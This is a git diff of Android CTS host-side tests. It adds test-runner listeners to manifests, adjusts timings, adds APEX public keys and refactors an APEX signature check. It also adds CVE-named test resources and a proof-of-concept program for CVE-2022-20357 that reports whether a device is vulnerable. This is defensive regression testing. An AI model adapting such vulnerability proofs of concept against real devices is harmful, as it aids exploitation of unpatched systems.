import com.google.common.collect.ImmutableSet;
import java.util.HashMap;
-import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import java.util.regex.Matcher;
@@ -66,7 +63,7 @@
final long configId = getClass().getCanonicalName().hashCode();
installPackage(Q_TEST_APK, false);
- Thread.currentThread().sleep(100);
+ Thread.currentThread().sleep(200);
setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
try {
@@ -86,7 +83,7 @@
final Set<Long> disabledChanges = ImmutableSet.of();
installPackage(Q_TEST_APK, false);
- Thread.currentThread().sleep(100);
+ Thread.currentThread().sleep(200);
setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
try {
@@ -116,7 +113,7 @@
final Set<Long> enabledChanges = ImmutableSet.of(SELINUX_LATEST_CHANGES);
final Set<Long> disabledChanges = ImmutableSet.of();
installPackage(R_TEST_APK, false);
- Thread.currentThread().sleep(100);
+ Thread.currentThread().sleep(200);
setCompatConfig(enabledChanges, disabledChanges, TEST_PKG);
try {
diff --git a/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml b/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
index 4c5734c..9454b60 100644
--- a/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
+++ b/hostsidetests/appcompat/hiddenapi/app/AndroidManifest.xml
@@ -27,5 +27,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.server.cts.device.statsd"
android:label="CTS tests of android.os.statsd stats collection">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey
new file mode 100644
index 0000000..e6ffe58
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/build.bazel.examples.apex.minimal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey
new file mode 100644
index 0000000..4288519
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.adservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey
new file mode 100644
index 0000000..bef1df6
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.product.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey
new file mode 100644
index 0000000..ef0438e
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey
new file mode 100644
index 0000000..0d978b8
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.system_ext.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey
new file mode 100644
index 0000000..3ad68fc
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.apex.vendor.test.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey
new file mode 100644
index 0000000..4e5acae
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.appsearch.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey
new file mode 100644
index 0000000..969211f
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.btservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey
new file mode 100644
index 0000000..0b720b8
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.car.framework.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey
new file mode 100644
index 0000000..a7f87c3
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.cellbroadcast.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey
new file mode 100644
index 0000000..3f09680
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.compos.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey
new file mode 100644
index 0000000..f37d3e4
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.extservices.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey
new file mode 100644
index 0000000..f705184
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.geotz.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey
new file mode 100644
index 0000000..b9164fb
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.core_permissions.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey
new file mode 100644
index 0000000..3b6411d
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.power.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey
new file mode 100644
index 0000000..98dfb71
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.sensors.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey
new file mode 100644
index 0000000..8f7cf72
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.thermal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey
new file mode 100644
index 0000000..0302d63
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.usb.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey
new file mode 100644
index 0000000..a6ca630
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.vibrator.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey
new file mode 100644
index 0000000..63fba77
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.hardware.wifi.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey
new file mode 100644
index 0000000..c1b8dda
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.mediaprovider.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey
new file mode 100644
index 0000000..e95ecbe
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.modules.updatablesharedlibs.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey
new file mode 100644
index 0000000..4e74bb1
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.ondevicepersonalization.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey
new file mode 100644
index 0000000..d78af8b
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.os.statsd.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey
new file mode 100644
index 0000000..9eaf852
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.permission.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey
new file mode 100644
index 0000000..94d4e70
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.rkpd.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey
new file mode 100644
index 0000000..63bbfab
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.scheduling.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey
new file mode 100644
index 0000000..ccdd6d6
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.uwb.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey
new file mode 100644
index 0000000..479a868
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.drv2624.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey
new file mode 100644
index 0000000..497aa29
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vibrator.sunfish.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey
new file mode 100644
index 0000000..79ab8db
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.virt.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey
new file mode 100644
index 0000000..f408d2b
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.vndk.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey
new file mode 100644
index 0000000..e98ee34
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.android.wifi.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey
new file mode 100644
index 0000000..1fc39e1
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.google.cf.apex.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey b/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey
new file mode 100644
index 0000000..0c28e11
--- /dev/null
+++ b/hostsidetests/appsecurity/res/apexsigverify/com.google.emulated.camera.provider.hal.avbpubkey
Binary files differ
diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
index b73c8d7..844111e 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ApexSignatureVerificationTest.java
@@ -30,14 +30,13 @@
import com.android.tradefed.util.FileUtil;
import com.android.tradefed.util.ZipUtil;
-import org.hamcrest.CustomTypeSafeMatcher;
-import org.hamcrest.Matcher;
+import com.google.common.truth.Expect;
+
import org.junit.AfterClass;
import org.junit.Before;
import org.junit.Ignore;
import org.junit.Rule;
import org.junit.Test;
-import org.junit.rules.ErrorCollector;
import org.junit.rules.TestRule;
import org.junit.runner.Description;
import org.junit.runner.RunWith;
@@ -87,7 +86,7 @@
private ITestDevice mDevice;
@Rule
- public final ErrorCollector mErrorCollector = new ErrorCollector();
+ public final Expect mExpect = Expect.create();
@Before
public void setUp() throws Exception {
@@ -153,8 +152,8 @@
while (it.hasNext()) {
final File wellKnownKey = (File) it.next();
- verifyPubKey("must not use well known pubkey", pubKeyFile,
- pubkeyShouldNotEqualTo(wellKnownKey));
+ mExpect.withMessage(entry.getKey() + " must not use well known pubkey")
+ .that(areKeysMatching(pubKeyFile, wellKnownKey)).isFalse();
}
}
}
@@ -192,7 +191,8 @@
try {
apexes = mDevice.getActiveApexes();
for (ITestDevice.ApexInfo ap : apexes) {
- if (!ap.sourceDir.startsWith("/data/")) {
+ // Compressed APEXes on /system are decompressed to /data/apex/decompressed
+ if (!ap.sourceDir.startsWith("/data/apex/active")) {
mPreloadedApexPathMap.put(ap.name, ap.sourceDir);
}
}
@@ -279,24 +279,14 @@
assertThat(mWellKnownKeyFileList).isNotEmpty();
}
- private <T> void verifyPubKey(String reason, T actual, Matcher<? super T> matcher) {
- mErrorCollector.checkThat(reason, actual, matcher);
- }
-
- private static Matcher<File> pubkeyShouldNotEqualTo(File wellknownKey) {
- return new CustomTypeSafeMatcher<File>("must not match well known key ") {
- @Override
- protected boolean matchesSafely(File actual) {
- boolean isMatchWellknownKey = false;
- try {
- isMatchWellknownKey = FileUtil.compareFileContents(actual, wellknownKey);
- } catch (IOException e) {
- e.printStackTrace();
- }
- // Assert fail if the keys matched
- return !isMatchWellknownKey;
- }
- };
+ private static boolean areKeysMatching(File pubkey, File wellknownKey) {
+ try {
+ return FileUtil.compareFileContents(pubkey, wellknownKey);
+ } catch (IOException e) {
+ throw new AssertionError(
+ "Failed to compare " + pubkey.getAbsolutePath() + " and "
+ + wellknownKey.getAbsolutePath());
+ }
}
/**
diff --git a/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml b/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
index 15d382b..5331c28 100644
--- a/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
+++ b/hostsidetests/appsecurity/test-apps/ApkVerityTestApp/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.appsecurity.cts.apkveritytestapp"
android:label="CTS test app of apk verity">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>/>
</manifest>
diff --git a/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml b/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
index 8b3e7e4..b582828 100755
--- a/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
+++ b/hostsidetests/compilation/app_using_other_app/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.compilation.cts.appusingotherapp"
android:label="An instrumentation test that uses another app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/hostsidetests/compilation/status_checker_app/AndroidManifest.xml b/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
index 3c53636..9c2a878 100755
--- a/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
+++ b/hostsidetests/compilation/status_checker_app/AndroidManifest.xml
@@ -20,5 +20,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.compilation.cts.statuscheckerapp"
android:label="An instrumentation test that checks optimization status">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml b/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
index a1ee42c..5b19966 100644
--- a/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/CertInstaller/AndroidManifest.xml
@@ -51,6 +51,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Delegated Cert Installer CTS test"
android:targetPackage="com.android.cts.certinstaller">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
index e81c523..b6ebb20 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api23/AndroidManifest.xml
@@ -43,5 +43,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Profile and Device Owner CTS Tests API 23"
android:targetPackage="com.android.cts.deviceandprofileowner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
index c22cb2f..abe12e1 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api25/AndroidManifest.xml
@@ -39,5 +39,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Profile and Device Owner CTS Tests"
android:targetPackage="com.android.cts.deviceandprofileowner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
index efd7260..07d5bd0 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/api30/AndroidManifest.xml
@@ -39,5 +39,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Profile and Device Owner CTS Tests"
android:targetPackage="com.android.cts.deviceandprofileowner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
index ad4ec40..caafec7 100644
--- a/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceAndProfileOwner/latest/AndroidManifest.xml
@@ -148,5 +148,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="Profile and Device Owner CTS Tests"
android:targetPackage="com.android.cts.deviceandprofileowner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml b/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
index 602f9ee..ed5bf39 100644
--- a/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/DeviceOwner/AndroidManifest.xml
@@ -98,5 +98,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.cts.deviceowner"
android:label="Device Owner CTS tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml b/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
index 8f842a2..782b25e 100644
--- a/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/SimpleSmsApp/AndroidManifest.xml
@@ -74,5 +74,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony.cts.sms.simplesmsapp">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml b/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
index c7088b2..f63f46e 100644
--- a/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
+++ b/hostsidetests/devicepolicy/app/TestIme/AndroidManifest.xml
@@ -40,5 +40,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.cts.testime">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml b/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
index 6a863ad..e2b1268 100644
--- a/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
+++ b/hostsidetests/incident/apps/boundwidgetapp/AndroidManifest.xml
@@ -45,5 +45,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.appwidget.cts"
android:label="CTS Tests for the dumpsys protobuf protocol">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml b/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
index 977b888..75f05b1 100644
--- a/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
+++ b/hostsidetests/media/app/MediaExtractorTest/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.cts"
android:label="Device test app for MediaExtractor host side tests.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21118.bin b/hostsidetests/securitybulletin/res/cve_2023_21118.bin
new file mode 100644
index 0000000..6dc2aaa
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21118.bin
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21127.ogg b/hostsidetests/securitybulletin/res/cve_2023_21127.ogg
new file mode 100644
index 0000000..f5e9deb
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21127.ogg
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2023_21261.ttf b/hostsidetests/securitybulletin/res/cve_2023_21261.ttf
new file mode 100644
index 0000000..882ad96
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2023_21261.ttf
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v1-only-10-signers.apk b/hostsidetests/securitybulletin/res/v1-only-10-signers.apk
new file mode 100644
index 0000000..198beeb
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v1-only-10-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v1-only-11-signers.apk b/hostsidetests/securitybulletin/res/v1-only-11-signers.apk
new file mode 100644
index 0000000..95e6c61
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v1-only-11-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v2-only-10-signers.apk b/hostsidetests/securitybulletin/res/v2-only-10-signers.apk
new file mode 100644
index 0000000..ad34c14
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v2-only-10-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/v2-only-11-signers.apk b/hostsidetests/securitybulletin/res/v2-only-11-signers.apk
new file mode 100644
index 0000000..674b6e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/v2-only-11-signers.apk
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp
new file mode 100644
index 0000000..579666e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2022-20357",
+ defaults: [
+ "cts_hostsidetests_securitybulletin_defaults",
+ ],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libgui",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp
new file mode 100644
index 0000000..ad773c8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2022-20357/poc.cpp
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define private public
+
+#include <gui/SurfaceComposerClient.h>
+#include <gui/SurfaceControl.h>
+
+#include "../includes/common.h"
+
+using namespace android;
+
+int main() {
+ constexpr int32_t val = 0;
+ constexpr int32_t width = 100;
+ constexpr int32_t height = 100;
+ std::string layerName = "layerName";
+ constexpr int32_t createFlags =
+ ISurfaceComposerClient::eCursorWindow | ISurfaceComposerClient::eOpaque;
+ constexpr PixelFormat formats[] = {PIXEL_FORMAT_RGBA_1010102, PIXEL_FORMAT_RGBA_FP16,
+ PIXEL_FORMAT_RGBA_4444};
+
+ sp<SurfaceComposerClient> surfaceComposerClient = new SurfaceComposerClient();
+
+ for (PixelFormat format : formats) {
+ sp<SurfaceControl> surfaceControl =
+ new SurfaceControl(surfaceComposerClient, nullptr, val, layerName, width, height,
+ format, val, createFlags);
+ sp<SurfaceControl> newSurfaceControl = new SurfaceControl(surfaceControl);
+ FAIL_CHECK(newSurfaceControl->mWidth == width);
+ FAIL_CHECK(newSurfaceControl->mHeight == height);
+ FAIL_CHECK(newSurfaceControl->mCreateFlags == createFlags);
+ if (newSurfaceControl->mFormat == format) {
+ return EXIT_SUCCESS;
+ }
+ }
+
+ return EXIT_VULNERABLE;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp
new file mode 100644
index 0000000..e235d48
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
